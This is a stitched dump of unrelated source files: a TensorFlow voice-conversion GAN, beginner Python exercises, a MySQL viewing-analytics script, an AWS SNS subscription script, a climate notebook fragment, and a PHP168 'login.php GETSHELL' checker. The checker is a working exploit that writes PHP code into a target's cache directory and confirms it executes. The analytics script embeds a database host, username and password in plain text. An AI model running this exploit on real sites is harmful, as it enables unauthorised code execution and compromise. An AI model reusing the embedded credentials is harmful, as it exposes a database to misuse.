self._discriminator)
self._encode = tf.make_template(
'Encoder',
self._encoder)
def _sanity_check(self):
for net in ['encoder', 'generator', 'discriminator']:
assert len(self.arch[net]['output']) > 2
assert len(self.arch[net]['output']) == len(self.arch[net]['kernel'])
assert len(self.arch[net]['output']) == len(self.arch[net]['stride'])
def _unit_embedding(self, n_class, h_dim, scope_name, var_name='y_emb'):
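        # Per-speaker embedding table (n_class x h_dim), L2-normalized along the feature axis.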
with tf.variable_scope(scope_name):
embeddings = tf.get_variable(
name=var_name,
shape=[n_class, h_dim])
embeddings = tf.nn.l2_normalize(embeddings, dim=-1, name=var_name+'normalized')
return embeddings
def _merge(self, var_list, fan_out, l2_reg=1e-6):
'''
Note: Don't apply BN on this because 'y'
tends to be the same inside a batch.
'''
x = 0.
with slim.arg_scope(
[slim.fully_connected],
num_outputs=fan_out,
weights_regularizer=slim.l2_regularizer(l2_reg),
normalizer_fn=None,
activation_fn=None):
for var in var_list:
x = x + slim.fully_connected(var)
x = slim.bias_add(x)
return x
def _l2_regularized_embedding(self, n_class, h_dim, scope_name, var_name='y_emb'):
with tf.variable_scope(scope_name):
embeddings = tf.get_variable(
name=var_name,
shape=[n_class, h_dim],
regularizer=slim.l2_regularizer(1e-6))
return embeddings
def _encoder(self, x, is_training):
n_layer = len(self.arch['encoder']['output'])
subnet = self.arch['encoder']
with slim.arg_scope(
[slim.batch_norm],
scale=True, scope='BN',
updates_collections=None,
decay=0.9, epsilon=1e-5, # [TODO] Test these hyper-parameters
is_training=is_training):
with slim.arg_scope(
[slim.conv2d],
weights_regularizer=slim.l2_regularizer(subnet['l2-reg']),
normalizer_fn=slim.batch_norm,
activation_fn=lrelu):
for i in range(n_layer):
x = slim.conv2d(
x,
subnet['output'][i],
subnet['kernel'][i],
subnet['stride'][i])
tf.summary.image(
'down-sample{:d}'.format(i),
tf.transpose(x[:, :, :, 0:3], [2, 1, 0, 3]))
x = slim.flatten(x)
with slim.arg_scope(
[slim.fully_connected],
num_outputs=self.arch['z_dim'],
weights_regularizer=slim.l2_regularizer(subnet['l2-reg']),
normalizer_fn=None,
activation_fn=None):
z_mu = slim.fully_connected(x)
z_lv = slim.fully_connected(x)
return z_mu, z_lv
def _generator(self, z, y, is_training):
''' In this version, we only generate the target, so `y` is useless '''
subnet = self.arch['generator']
n_layer = len(subnet['output'])
h, w, c = subnet['hwc']
y = tf.nn.embedding_lookup(self.y_emb, y)
x = self._merge([z, y], subnet['merge_dim'])
x = lrelu(x)
with slim.arg_scope(
[slim.batch_norm],
scale=True, scope='BN',
updates_collections=None,
decay=0.9, epsilon=1e-5,
is_training=is_training):
x = slim.fully_connected(
x,
h * w * c,
normalizer_fn=slim.batch_norm,
activation_fn=lrelu)
x = tf.reshape(x, [-1, h, w, c])
with slim.arg_scope(
[slim.conv2d_transpose],
weights_regularizer=slim.l2_regularizer(subnet['l2-reg']),
normalizer_fn=slim.batch_norm,
activation_fn=lrelu):
for i in range(n_layer -1):
x = slim.conv2d_transpose(
x,
subnet['output'][i],
subnet['kernel'][i],
subnet['stride'][i]
# normalizer_fn=None
)
# Don't apply BN for the last layer of G
x = slim.conv2d_transpose(
x,
subnet['output'][-1],
subnet['kernel'][-1],
subnet['stride'][-1],
normalizer_fn=None,
activation_fn=None)
# pdb.set_trace()
logit = x
x = tf.nn.tanh(logit)
return x, logit
def _discriminator(self, x, is_training):
# def _discriminator(self, x, is_training):
''' Note: In this version, `y` is useless '''
subnet = self.arch['discriminator']
n_layer = len(subnet['output'])
# y_dim = self.arch['y_dim']
# h, w, _ = self.arch['hwc']
# y_emb = self._l2_regularized_embedding(y_dim, h * w, 'y_embedding_disc_in')
# y_vec = tf.nn.embedding_lookup(y_emb, y)
# y_vec = tf.reshape(y_vec, [-1, h, w, 1])
intermediate = list()
intermediate.append(x)
# x = tf.concat(3, [x, y_vec]) # inject y into x
with slim.arg_scope(
[slim.batch_norm],
scale=True, scope='BN',
updates_collections=None,
decay=0.9, epsilon=1e-5,
is_training=is_training):
with slim.arg_scope(
[slim.conv2d],
weights_regularizer=slim.l2_regularizer(subnet['l2-reg']),
normalizer_fn=slim.batch_norm,
activation_fn=lrelu):
# Radford: [do] not applying batchnorm to the discriminator input layer
x = slim.conv2d(
x,
subnet['output'][0],
subnet['kernel'][0],
subnet['stride'][0],
normalizer_fn=None)
intermediate.append(x)
for i in range(1, n_layer):
x = slim.conv2d(
x,
subnet['output'][i],
subnet['kernel'][i],
subnet['stride'][i])
intermediate.append(x)
tf.summary.image(
'upsampling{:d}'.format(i),
tf.transpose(x[:, :, :, 0:3], [2, 1, 0, 3]))
# Don't apply BN for the last layer
x = slim.flatten(x)
h = slim.flatten(intermediate[subnet['feature_layer'] - 1])
# y_vec = tf.nn.embedding_lookup(self.y_emb, y)
# x = self._merge([x], subnet['merge_dim'])
# x = lrelu(x)
# x = slim.fully_connected(
# x,
# subnet['merge_dim'],
# weights_regularizer=slim.l2_regularizer(subnet['l2-reg']),
# activation_fn=lrelu)
x = slim.fully_connected(
x,
1,
weights_regularizer=slim.l2_regularizer(subnet['l2-reg']),
activation_fn=None)
return x, h # no explicit `sigmoid`
def loss(self, x_s, y_s, x_t, y_t):
''' '''
# def thresholding_add(x, v, minval=-1., maxval=1.):
# x_v = x + v
# x_v = tf.maximum(x_v, minval)
# x_v = tf.minimum(x_v, maxval)
# return x_v
def circuit_loop(x, y):
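            # One full pass: encode x, sample z, decode conditioned on speaker y,
            # then re-encode the reconstruction and score both x and xh with the discriminator.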
# v = decay * tf.random_normal(shape=tf.shape(x))
z_mu, z_lv = self._encode(x, is_training=self.is_training)
z = GaussianSampleLayer(z_mu, z_lv)
x_logit, x_feature = self._discriminate(
x, is_training=self.is_training)
xh, xh_sig_logit = self._generate(z, y, is_training=self.is_training)
zh_mu, zh_lv = self._encode(xh, is_training=self.is_training)
xh_logit, xh_feature = self._discriminate(
xh, is_training=self.is_training)
return dict(
z=z,
z_mu=z_mu,
z_lv=z_lv,
# y_logit=y_logit,
xh=xh,
xh_sig_logit=xh_sig_logit,
# xo=xo,
x_logit=x_logit,
x_feature=x_feature,
zh_mu=zh_mu,
zh_lv=zh_lv,
# yh_logit=yh_logit,
xh_logit=xh_logit,
xh_feature=xh_feature,
# xr=xr
)
s = circuit_loop(x_s, y_s)
t = circuit_loop(x_t, y_t)
s2t = circuit_loop(x_s, y_t)
with tf.name_scope('loss'):
def mean_sigmoid_cross_entropy_with_logits(logit, truth):
'''
truth: 0. or 1.
'''
return tf.reduce_mean(
tf.nn.sigmoid_cross_entropy_with_logits(
logit,
truth * tf.ones_like(logit)))
loss = dict()
# Parallel
loss['reconst_t'] = \
tf.reduce_mean(t['x_logit']) \
- tf.reduce_mean(t['xh_logit'])
# Parallel
loss['reconst_s'] = \
tf.reduce_mean(s['x_logit']) \
- tf.reduce_mean(s['xh_logit'])
# Non-parallel
loss['conv_s2t'] = \
tf.reduce_mean(t['x_logit']) \
- tf.reduce_mean(s2t['xh_logit'])
# Non-parallel: s v. t
loss['real_s_t'] = \
tf.reduce_mean(t['x_logit']) \
- tf.reduce_mean(s['x_logit'])
# That's why I only take the last term into consideration
loss['WGAN'] = loss['conv_s2t']
# VAE's Kullback-Leibler Divergence
loss['KL(z)'] = \
tf.reduce_mean(
GaussianKLD(
s['z_mu'], s['z_lv'],
tf.zeros_like(s['z_mu']), tf.zeros_like(s['z_lv']))) +\
tf.reduce_mean(
GaussianKLD(
t['z_mu'], t['z_lv'],
tf.zeros_like(t['z_mu']), tf.zeros_like(t['z_lv'])))
loss['KL(z)'] /= 2.0
# VAE's Reconstruction Neg. Log-Likelihood (on the 'feature' space of Dx)
loss['Dis'] = \
tf.reduce_mean(
GaussianLogDensity(
slim.flatten(x_t),
slim.flatten(t['xh']),
tf.zeros_like(slim.flatten(x_t)))) +\
tf.reduce_mean(
GaussianLogDensity(
slim.flatten(x_s),
slim.flatten(s['xh']),
tf.zeros_like(slim.flatten(x_s))))
loss['Dis'] /= - 2.0
# loss['Dis'] = tf.reduce_mean(
# tf.reduce_sum(
# tf.nn.sigmoid_cross_entropy_with_logits(
# slim.flatten(t['xh_sig_logit']),
# slim.flatten(x_t * .5 + .5)) +\
# tf.nn.sigmoid_cross_entropy_with_logits(
# slim.flatten(s['xh_sig_logit']),
# slim.flatten(x_s * .5 + .5)),
# -1))
# # Note: Please remember to apply reduce_sum along the last dim
# # (here, it's not 1 as is in D/G loss.)
# loss['Dis'] = tf.reduce_mean(
# (s2t['xh_logit'] + s['xh_logit'] + t['xh_logit']) / 3.)
# # Use 'feature' item instead of raw input because the former is 'flattened'
# loss['Dis'] = tf.reduce_mean(
# tf.reduce_sum(tf.square(s['x_feature'] - s['xh_feature']), -1) +\
# tf.reduce_sum(tf.square(t['x_feature'] - t['xh_feature']), -1))
# [TODO] Maybe I should normalize (divide by 2 or 3) the above costs.
# For summaries
with tf.name_scope('Summary'):
# tf.summary.scalar('DKL_x', loss['KL(x)'])
tf.summary.scalar('DKL_z', loss['KL(z)'])
tf.summary.scalar('MMSE', loss['Dis'])
# tf.summary.scalar('D_real', loss['D_real'])
# tf.summary.scalar('G_fake', loss['G_fake'])
tf.summary.scalar('WGAN', loss['WGAN'])
tf.summary.scalar('WGAN-s', loss['reconst_s'])
tf.summary.scalar('WGAN-t', loss['reconst_t'])
tf.summary.scalar('WGAN-s2t', loss['conv_s2t'])
tf.summary.scalar('WGAN-t-s', loss['real_s_t'])
tf.summary.histogram('y', tf.concat(0, [y_t, y_s]))
# tf.summary.histogram('yh_s', tf.argmax(s['yh_logit'], 1))
# tf.summary.histogram('yh_t', tf.argmax(t['yh_logit'], 1))
tf.summary.histogram('z', tf.concat(0, [s['z'], t['z']]))
tf.summary.histogram('z_s', s['z'])
tf.summary.histogram('z_t', t['z'])
tf.summary.histogram('z_mu', tf.concat(0, [s['z_mu'], t['z_mu']]))
tf.summary.histogram('z_mu_s', s['z_mu'])
tf.summary.histogram('z_mu_t', t['z_mu'])
tf.summary.histogram('z_lv', tf.concat(0, [s['z_lv'], t['z_lv']]))
tf.summary.histogram('z_lv_s', s['z_lv'])
tf.summary.histogram('z_lv_t', t['z_lv'])
# tf.summary.histogram('D_t_t', tf.nn.sigmoid(x_t_from_t_logit))
# tf.summary.histogram('D_t_s', tf.nn.sigmoid(x_t_from_s_logit))
# tf.summary.histogram('D_t', tf.nn.sigmoid(x_t_logit))
# tf.summary.histogram('D_s', tf.nn.sigmoid(x_s_logit))
tf.summary.histogram('logit_t_from_t', t['xh_logit'])
tf.summary.histogram('logit_t_from_s', s2t['xh_logit'])
tf.summary.histogram('logit_t', t['x_logit'])
# tf.summary.histogram('logit_s', s['x_logit'])
# tf.summary.histogram(
# 'logit_s_True_and_Fake)',
# tf.concat(0, [x_s_from_s_logit, x_s_logit]))
tf.summary.histogram(
'logit_t_True_FromT_FromS',
tf.concat(0, [t['x_logit'], t['xh_logit'], s2t['xh_logit']]))
tf.summary.histogram(
'logit_s_v_sh',
tf.concat(0, [s['x_logit'], s['xh_logit']]))
tf.summary.histogram(
'logit_t_v_th',
tf.concat(0, [t['x_logit'], t['xh_logit']]))
# # tf.image_summary("G", xh)
# tf.summary.scalar('Ent_on_y', loss['y'])
# tf.summary.scalar('Diff_zs_zt', loss['z'])
return loss
# def sample(self, z=128):
# ''' Generate fake samples given `z`
# if z is not given or is an `int`,
# this fcn generates (z=128) samples
# '''
# z = tf.random_uniform(
# shape=[z, self.arch['z_dim']],
# minval=-1.0,
# maxval=1.0,
# name='z_test')
# return self._generate(z, is_training=False)
def encode(self, x):
z_mu, z_lv = self._encode(x, is_training=False)
return dict(mu=z_mu, log_var=z_lv)
def decode(self, z, y, tanh=False):
# if tanh:
# return self._generate(z, y, is_training=False)
# else:
# return self._generate(z, y, is_training=False)
xh, _ = self._generate(z, y, is_training=False)
# tf.summary.image('xh', tf.transpose(xh, [2, 1, 0, 3]))
# return self._filter(xh, is_training=False)
return xh
def discriminate(self, x):
'''
To estimate the EMD, we need D to assign a score per sample.
*The batches can be of different size
'''
# s_true, _ = self._discriminate(x_true, is_training=False)
# s_fake, _ = self._discriminate(x_fake, is_training=False)
# return s_true, s_fake
s, _ = self._discriminate(x, is_training=False)
return s
# def classify(self, x):
# return self._classify(tf.nn.softmax(x), is_training=False)
# def interpolate(self, x1, x2, n):
# ''' Interpolation from the latent space '''
# x1 = tf.expand_dims(x1, 0)
# x2 = tf.expand_dims(x2, 0)
# z1, _ = self._encode(x1, is_training=False)
# z2, _ = self._encode(x2, is_training=False)
# a = tf.reshape(tf.linspace(0., 1., n), [n, 1])
# z1 = tf.matmul(1. - a, z1)
# z2 = tf.matmul(a, z2)
# z = tf.nn.tanh(tf.add(z1, z2)) # Gaussian-to-Uniform
# xh = self._generate(z, is_training=False)
# xh = tf.concat(0, [x1, xh, x2])
# return xh
| [
"jjsyu0304@gmail.com"
] | jjsyu0304@gmail.com |
e8c658bb145209c4e3540ddf993832ff810fd254 | 31976379efa3e90cffe8eb8be2a1ab88fb233b14 | /1.BASIC PROGRAMS/5.arithmatic_op.py | e28b73059cdb42ef11beff85cfa1bb7823937a9a | [] | no_license | Vinaypatil-Ev/aniket | e5fadb504a2dc6cf0f40e565db963b3f3af8d699 | 530f7c7a0e4e96a7390c78dd3366da6d66e16884 | refs/heads/master | 2023-07-11T11:18:15.054165 | 2021-08-21T05:56:57 | 2021-08-21T05:56:57 | 397,871,256 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 372 | py | # WAP to demonstrate arithmetic operation on two integer numbers.
print("Enter two digits")
a = float(input("Enter first digit: "))
b = float(input("Enter second digit: "))
print(f"{a} + {b} = {a + b}") # addition
print(f"{a} - {b} = {a - b}") # substraction
print(f"{a} * {b} = {a * b}") # mul
print(f"{a} / {b} = {a / b}") # div
print(f"{a} % {b} = {a % b}") # mod | [
"vinaypatil153@gmail.com"
] | vinaypatil153@gmail.com |
3491ef318b0885d7a517472a36167e2e55523e3e | a5cd7896d91cf67ede7aec721e73c837a4328d01 | /0008_rep_fields.py | 82b64874b1cac0bcc72242866df9e946dacfe1a9 | [] | no_license | DonCastillo/learning-python | 8bdb6e4bfebefa5a428a89c739db6f7142a759db | a5d803642d435f806209f1b9c5803672e89bf06d | refs/heads/master | 2023-04-08T13:26:59.506073 | 2021-04-17T03:38:29 | 2021-04-17T03:38:29 | 330,097,211 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 944 | py | age = 24
name = "Tim"
# str() parses int to string
print("My age is " + str(age) + " years")
# replaces {0} to age
print("My age is {0} years".format(age))
# using printf version
print("My age is %d years old" % age)
# just like string template literal in JS. No need to use .format(value) function
print(name + f"'s age is {age} years old")
# should always starts with {0}
print("There are {0} days in {1}, {2}, {3}, {4}, {5}, {6}, and {7}"
.format(31, "Jan", "Mar", "May", "Jul", "Aug", "Oct", "Dec"))
print("There are {0} days in Jan, Mar, May, Jul, Aug, Oct, and Dec".format(31))
# {0} => 28
# {1} => 30
# {2} => 31
print("Jan: {2}, Feb: {0}, Mar: {2}, Apr: {1}, May: {2}, Jun: {1}, Jul: {2}, Aug: {2}, Sep: {1}, Oct: {2}, Nov: {1}, Dec: {2}"
.format(28, 30, 31))
print()
print("""Jan: {2},
Feb: {0}
Mar: {2}
Apr: {1}
May: {2}
Jun: {1}
Jul: {2}
Aug: {2}
Sep: {1}
Oct: {2}
Nov: {1}
Dec: {2}""".format(28, 30, 31)) | [
"don.qcastillo@yahoo.com"
] | don.qcastillo@yahoo.com |
ba990ba9894257dc692adaf65f93b509b0043716 | 55a4fa8f0fe859d9683b5dd826a9b8378a6503df | /python/AnalyzeUserEnjoyed.py | f3a5ebba9db0795b35a773660f87060d59355b19 | [] | no_license | rongc5/test | 399536df25d3d3e71cac8552e573f6e2447de631 | acb4f9254ecf647b8f36743899ae38a901b01aa6 | refs/heads/master | 2023-06-26T05:38:37.147507 | 2023-06-15T03:33:08 | 2023-06-15T03:33:08 | 33,905,442 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 8,153 | py | #coding=utf-8
#!/usr/bin/python
#Author zm
#time 2013-10-31 11:24:36
import os, sys, time, MySQLdb as MYDB, logging, datetime, logging.handlers, calendar, string
class UserEnjoyed:
def __init__(self, date=None):
format='%(asctime)s %(filename)s[line:%(lineno)d] %(levelname)s ->%(message)s'
log = '%s.log' % ('UserEnjoyed',)
handler = logging.handlers.RotatingFileHandler(log, 'a', 256*1024*1024, 0)
formatter = logging.Formatter(format)
handler.setFormatter(formatter)
self.logger = logging.getLogger('test')
self.logger.addHandler(handler)
self.logger.setLevel(logging.DEBUG)
self.db = MYDB.connect('123.103.62.131', 'permitdbuser', 'permitdbpwd', 'statistics', 3306)
self.con = self.db.cursor()
charset = 'SET NAMES utf8'
self.con.execute(charset)
self.myepg = []
self.mydev = {}
self.myUserEnjoy = {}
self.epgType = ['56', '57', '59', '60', '69', '83', '84']
self.epg_sbuf = ''
self.epg_ebuf = ''
if not date:
self.curdate = date
def getPrevXdate(self, x):
timer = long(time.time())
timer = timer - x*24*60*60
stu = time.localtime(timer);
self.curdate = '%d-%02d-%02d' % (stu.tm_year, stu.tm_mon, stu.tm_mday)
def getDateForrmat(self, mydate):
if mydate.find('-') != -1 and mydate.find(':') == -1:
mydate = '%s %s:%s:%s' % (self.curdate, '00', '00', '00')
elif mydate.find('-') == -1 and mydate.find(':') != -1:
mydate = '%s %s' % (self.curdate, mydate)
elif mydate.find('-') == -1 and mydate.find(':') == -1:
mydate = '%s %s:%s:%s' % (self.curdate, '00', '00', '00')
#print 'hello', mydate
return mydate
def getTimer(self, formatter, mytime):
#print formatter, mytime
stu = time.strptime(mytime, formatter)
timer = time.mktime(stu)
return long(timer)
def load_epg_info(self):
sql = '''select epg_channleid, epg_programid, epg_stime, epg_etime, SUBSTRING(epg_propertyid, 2, 8) from %s where epg_date=DATE_FORMAT('%s', '%%Y-%%m-%%d') \
and epg_stime < epg_etime and LOCATE('55',epg_propertyid)>0 and LOCATE('76',epg_propertyid)=0;''' % ('epg_program_syn', self.curdate)
self.con.execute(sql)
rows = self.con.fetchall()
print sql
self.logger.info(sql)
stimer = 0
etimer = 0
timer = [0, 0]
for row in rows:
stime = ''
etime = ''
stime = '''%s''' % row[2]
etime = '''%s''' % row[3]
#print stime, etime, row[2], row[3], row[0], row[1]
stime = self.getDateForrmat(stime)
etime = self.getDateForrmat(etime)
#print stime, etime, row[2], row[3], row[0], row[1]
timer[0] = self.getTimer('''%Y-%m-%d %H:%M:%S''', stime)
timer[1] = self.getTimer('''%Y-%m-%d %H:%M:%S''', etime)
#print timer[0], timer[1]
if timer[0] < stimer or not stimer:
#print timer[0], stimer, self.epg_sbuf
stimer = timer[0]
self.epg_sbuf = stime
#print stimer
if timer[1] > etimer:
etimer = timer[1];
self.epg_ebuf = etime
#print(self.epg_ebuf)
cid = int(row[0])
pid = int(row[1])
propertyid = '%s' % (row[4], )
mychannle = (cid, pid, stimer, etimer, propertyid)
#print mychannle
self.myepg.insert(0, mychannle)
def load_dev_info(self):
sql = '''select a.id, a.cid as channelid, a.mac, UNIX_TIMESTAMP(a.start) as stimer, UNIX_TIMESTAMP(a.end) as etimer from \
statistics.t_devChannelInfo a, haierdb.udev_basic b where a.start < a.end and a.cid != 0 and a.mac = b.mac and b.isactiv = 1 \
and a.start BETWEEN '%s' and '%s' UNION select a.id, a.cid as channelid, a.mac, UNIX_TIMESTAMP(a.start) as stimer, \
UNIX_TIMESTAMP(a.end) as etimer from statistics.t_devChannelInfo a, haierdb.udev_basic b where a.start < a.end and a.cid != 0 \
and a.mac = b.mac and b.isactiv = 1 and a.end BETWEEN '%s' and '%s' ''' % (self.epg_sbuf, self.epg_ebuf, self.epg_sbuf, self.epg_ebuf)
#print sql
self.con.execute(sql)
rows = self.con.fetchall()
self.logger.info(sql)
for row in rows:
id = int(row[0])
cid = int(row[1])
mac = str(row[2])
stimer = long(row[3])
etimer = long(row[4])
mydev = (cid, mac, stimer, etimer)
self.mydev[id] = mydev
def getUserEnjoy(self):
self.myepg.sort(lambda x,y:cmp(x[0],y[0]))
for i in self.mydev:
mydev = self.mydev[i]
#mac = "%s" % (mydev[1])
for k in self.myepg:
myepg = k
if mydev[0] < k[0]:
continue;
elif mydev[0] > k[0]:
break
elif mydev[0] == k[0]:
                if (mydev[2] >= myepg[2] and mydev[2] <= myepg[3]) or \
                    (mydev[3] >= myepg[2] and mydev[3] <= myepg[3]) or \
                    (mydev[2] <= myepg[3] and mydev[3] >= myepg[2]):
#print mydev[0], k[0], mydev[2], mydev[3], myepg[2], myepg[3]
for m in self.epgType:
epg_propertyid = '%s' % myepg[4]
#print epg_propertyid, m
if epg_propertyid.find(m) == -1:
continue
else:
a = (mydev[1], m)
#print a
if not self.myUserEnjoy.has_key(a):
self.myUserEnjoy[a] = [0, 0, 0]
                                '''value layout of myUserEnjoy[a]: list[0] == 0 means the mac is not yet in the MySQL table,
                                list[1] == 1 means the count changed during this run, list[2] is the running count
'''
self.myUserEnjoy[a][2] += 1
self.myUserEnjoy[a][1] = 1
break
else:
continue
def saveUserEnjoy(self):
for k, m in self.myUserEnjoy.iteritems():
if m[0] == 0 and m[2] != 0:
sql = '''insert into UserEnjoyInfo(mac, epg_propertyid, count, uptime) values('%s', '%s', '%d', NOW())''' % (k[0], k[1], m[2])
elif m[0] == 1 and m[1] == 1 and m[2] != 0:
sql = '''UPDATE UserEnjoyInfo set count = '%d', uptime = NOW() where mac = '%s' and epg_propertyid = '%s' ''' % (m[2], k[0], k[1])
else:
continue
print sql
self.con.execute(sql)
self.logger.debug(sql)
self.db.commit()
def load_UserEnjoy_from_mysql(self):
sql = '''SELECT mac, epg_propertyid, count from statistics.UserEnjoyInfo'''
self.con.execute(sql)
self.logger.info(sql)
rows = self.con.fetchall()
for row in rows:
mac = str(row[0])
propertyid = str(row[1])
count = int(row[2])
a= (mac, propertyid)
self.myUserEnjoy[a] = [1, 0, count]
def close(self):
self.con.close()
self.db.close()
self.myepg = {}
def main():
Analyl = UserEnjoyed()
Analyl.getPrevXdate(1)
Analyl.load_UserEnjoy_from_mysql()
Analyl.load_epg_info()
Analyl.load_dev_info()
Analyl.getUserEnjoy()
Analyl.saveUserEnjoy()
Analyl.close()
if __name__ == '__main__':
main()
| [
"rongc5@users.noreply.github.com"
] | rongc5@users.noreply.github.com |
dac1b1c0fe503898cc8fca5d9a91fbdca2a59fe0 | a694e5c183ad3bd394b1a1e065c42bf372c3fdd8 | /AWSTrials/Python/snstest1/subscribe_email_to_topic.py | dbdb4078f1f83f955c66e0466ab7cd2b735e8621 | [] | no_license | rjmeats/AWS-Trials | e788c675947030047a573a79f0653dfec77b6b62 | 899207a2b53ad9dc7d58c7f015016f1f44d01cf0 | refs/heads/master | 2020-04-19T14:25:34.317200 | 2019-12-13T16:25:50 | 2019-12-13T16:25:50 | 168,244,518 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,373 | py | # https://boto3.amazonaws.com/v1/documentation/api/latest/reference/services/sns.html
import sys
import time
import boto3
import list_topics as lt
sns_client = boto3.client('sns')
def subscribe_to_topic_for_email(topicname, address) :
arn = lt.convert_topic_name_to_arn(topicname)
# Check for existing subscription for this combo ?
if arn == "" :
print("Topic", topicname, "not found")
else :
print("Subscribing", address, "to topic:", topicname, "arn =", arn)
response = sns_client.subscribe(
TopicArn = arn,
Protocol = 'email',
Endpoint = address, # No restriction on what this is, could send to anyone!
ReturnSubscriptionArn = True
)
print("Response:", response)
# NB Confirmation message is sent as an email to the address above, containing a link to click to confirm the submission (with the confirmation token a URL
# parameter). So the confirmation process is not completed here - the subscription is in a pending state.
# If the module is re-run with the same topic/endpoint, another email is sent, and when confirmed it looks like the original subscription is replaced.
if __name__ == "__main__" :
print(len(sys.argv))
if len(sys.argv) < 2 :
print("*** No email address argument specified")
else :
address = sys.argv[1]
print(sns_client)
print()
subscribe_to_topic_for_email('test_topic2', address)
print()
| [
"35453720+rjmeats@users.noreply.github.com"
] | 35453720+rjmeats@users.noreply.github.com |
2ab04509e24100a9ede7ef6928825b1b175c0040 | 1ac340af4d1dbeb50d01cc9b093868c17e1080e6 | /Lists/Basics/01. invert_values.py | 0edc0d0d3ba3d1dea6ea2745269d03449cdaf107 | [] | no_license | geodimitrov/Python-Fundamentals-SoftUni | d7a53431aeac53e543216ed076b13aba2a5e3448 | 9f848f9921ffa03c0ae6c8664a344ac8eb489e04 | refs/heads/main | 2023-04-13T13:29:42.469616 | 2021-04-21T19:10:28 | 2021-04-21T19:10:28 | 323,114,691 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 416 | py |
# 1. Introduce input variable
string = input()
# 2. Use the split method to split the string into list
list_string = string.split()
new_list = []
# 3. Run a for loop to filter nums using conditions
for element in list_string:
num = int(element)
if num > 0:
new_list.append(-num)
elif num < 0:
new_list.append(abs(num))
else:
new_list.append(num)
print(new_list)
| [
"noreply@github.com"
] | geodimitrov.noreply@github.com |
ad9d846cfb0da2a2a9803522deae870af71d34bd | 56040a3e7d5e73c8fdca6dc70a7c5522aa4310b5 | /quiz/serializers.py | 7118fe3e98ac19881fd727c93570498e019abf09 | [] | no_license | kimbumso/heroku-repo | ea0dbbdc34439f51dfe0a5e201a9f117399b634d | 8774a2a592bb418a4e50d05d827fdae2cf5611f8 | refs/heads/master | 2023-01-23T22:18:37.401553 | 2020-12-04T02:43:00 | 2020-12-04T02:43:00 | 317,876,571 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 200 | py | from rest_framework import serializers
from .models import Quiz
class QuizSerializer(serializers.ModelSerializer):
class Meta:
model = Quiz
fields = ('title', 'content', 'answer') | [
"k101413@naver.com"
] | k101413@naver.com |
3e01df71c43a92672a6b4387ffcd0d505ed0ef01 | 6c219c027c7d0ef454bdeac196bd773e8b95d602 | /cms/php168/php168_login_getshell.py | 08224eb0012c6eed6e10a98c7606dfd32c336bc4 | [] | no_license | aStrowxyu/pocscan | 663f3a3458140e1bce7b4dc3702c6014a4c9ac92 | 08c7e7454c6b7c601bc54c21172c4788312603b1 | refs/heads/master | 2020-04-19T10:00:56.569105 | 2019-01-29T09:31:31 | 2019-01-29T09:31:31 | 168,127,418 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,581 | py | #!/usr/bin/env python
# -*- coding: utf-8 -*-
'''
name: PHP168 login.php GETSHELL vulnerability
referer: http://wooyun.org/bugs/wooyun-2014-050515
author: Lucifer
description: Searching for "Powered by php168 v6" (or earlier versions v5, v4, v3, v2, v1) turns up a large number of affected sites; the login.php file can be abused to write code into the cache directory.
'''
import sys
import requests
import warnings
from termcolor import cprint
class php168_login_getshell_BaseVerify():
def __init__(self, url):
self.url = url
def run(self):
headers = {
"User-Agent":"Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_8; en-us) AppleWebKit/534.50 (KHTML, like Gecko) Version/5.1 Safari/534.50"
}
payload = "/login.php?makehtml=1&chdb[htmlname]=404.php&chdb[path]=cache&content=<?php%20echo%20md5(1234);?>"
vulnurl = self.url + payload
try:
req = requests.get(vulnurl, headers=headers, timeout=10, verify=False)
verifyurl = self.url + "/cache/404.php"
req2 = requests.get(verifyurl, headers=headers, timeout=10, verify=False)
if r"81dc9bdb52d04dc20036dbd8313ed055" in req2.text:
cprint("[+]存在PHP168 GETSHELL漏洞...(高危)\tpayload: "+verifyurl, "red")
else:
cprint("[-]不存在php168_login_getshell漏洞", "white", "on_grey")
except:
cprint("[-] "+__file__+"====>可能不存在漏洞", "cyan")
if __name__ == "__main__":
warnings.filterwarnings("ignore")
testVuln = php168_login_getshell_BaseVerify(sys.argv[1])
testVuln.run() | [
"wangxinyu@vackbot.com"
] | wangxinyu@vackbot.com |
86024511a554590ea7ae122070eab0f619c43d93 | 4fd5860beb1e6809eee297509bcc776dfca40aca | /event_synchronization_analysis/ed_lf_es_mc.py | cab4b7d9f4e05674b37592ab836218dde4a38ed7 | [] | no_license | manmeet3591/fingerprint-volcano-enso-im | 40a41eca517abdd09079feb7ae58cc866343d6a8 | 21f39125ece4d03c5ee2961e4aae3768ee61cdb8 | refs/heads/master | 2021-07-05T09:49:28.858614 | 2021-04-19T02:55:45 | 2021-04-19T02:55:45 | 229,057,834 | 1 | 1 | null | null | null | null | UTF-8 | Python | false | false | 5,004 | py |
# coding: utf-8
# In[1]:
from __future__ import print_function, division
get_ipython().run_line_magic('matplotlib', 'inline')
import matplotlib.pyplot as plt
import numpy as np
import pandas as pd
import seaborn as sns
import datetime as dt
import warnings
import random
warnings.filterwarnings("ignore")
sns.set()
# In[2]:
nino3 = np.genfromtxt ('tas_Amon_IPSL-CM5A-LR_past1000_r1i1p1_0850_1850_1_nino3_tseries.csv', delimiter=",")
ismr = np.genfromtxt ('pr_Amon_IPSL-CM5A-LR_past1000_r1i1p1_0850_1850_india_goswami_2002_tseries.csv', delimiter=",")
vrf = np.genfromtxt ('sigl.txt', delimiter=",")
print(nino3.shape)
print(ismr.shape)
print(vrf.shape)
# In[3]:
def common_time_axis(dismr, verbose=True):
"""
Generates common time axis for Nino3 and ISMR time series.
"""
# generate the time axis
Nt = len(dismr)
time = [dt.datetime(850, 1, 15)]
for i in range(1, len(dismr)):
y = time[i - 1].year
m = time[i - 1].month
if m == 12:
y += 1
m = 0
time.append(dt.datetime(y, m + 1, 15))
time = np.array(time)
return time
def yearly_time_axis(dvolc, verbose=True):
"""
Generates time axis for yearly data
"""
Nt = len(dvolc)
time = [dt.datetime(900, 1, 15)]
for i in range(1, len(dvolc)):
y = time[i - 1].year
y += 1
time.append(dt.datetime(y, 1, 15))
time = np.array(time)
return time
def moving_average_anomaly(dismr,n=360):
"""
Generates moving average anomaly of long time series
"""
#print(dismr.shape)
